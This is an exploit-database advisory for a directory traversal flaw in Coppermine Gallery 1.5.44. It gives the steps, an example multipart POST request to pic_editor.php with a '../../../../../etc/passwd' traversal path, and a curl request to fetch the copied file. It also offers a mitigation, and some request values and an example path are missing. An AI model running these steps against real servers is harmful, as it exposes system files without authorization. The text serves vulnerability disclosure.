Coppermine Gallery 1.5.44 - Directory Traversal

ID EXPLOITPACK:654C6A6690E1C13B6890B29FAA429793
Type exploitpack
Reporter Hacker Fantastic
Modified 2017-02-15T00:00:00


Coppermine Gallery 1.5.44 - Directory Traversal

                                            Coppermine Gallery <= 1.5.44 directory traversal vulnerability
Coppermine is a multi-purpose fully-featured and integrated web
picture gallery script written in PHP using GD or ImageMagick as
image library with a MySQL backend. A directory travesal vuln
exists within the "save_thumb" function of the "crop & rotate"
image feature. This can be accessed from pic_editor.php. First
upload a file, e.g. "hackerhouse.png" to an album. This will
create a predictable file path location with your userid e.g:


You will then send a POST request to pic_editor to manipulate
this file but replace the "new_image" with the filepath you
want to read such as "../../../../../etc/passwd". Your file
will then by copied to a predictible path location as thumb.


To exploit this vulnerability you will need to be able to
register an account and upload files to a photo album. You
do not need admin rights to exploit this flaw. All versions
from cpg 1.4.14 to cpg 1.5.44 have been found vulnerable
to this flaw. The coppermine configuration was tested with
ImageMagick enabled, your mileage may vary with GD1.x/GD2.x.

To protect against this exploit do not allow public registration
requests and only allow trusted users to modify images.

Example POST request
POST /cpg15x/pic_editor.php HTTP/1.1
Host: target
Content-Length: 802
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAE29AdEqShlpLpDF
Accept: text/html,
Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
Cookie: <cookies>
DNT: 1
Connection: close

Content-Disposition: form-data; name="clipval"

Content-Disposition: form-data; name="newimage"

Content-Disposition: form-data; name="img_dir"

Content-Disposition: form-data; name="id"

Content-Disposition: form-data; name="angle"

Content-Disposition: form-data; name="save_thumb"
 Save as thumbnail 

Example file download request
$ curl http://targetip/cpg15x/albums/userpics/10001/thumb_hackerhouse.png 
... snip

An additional directory traversal vulnerability is present
in "showthumb.php" which can be used to stat() for the existence
of files by reviewing the error returned. You must have 
sufficient rights to use this feature however.


-- Hacker Fantastic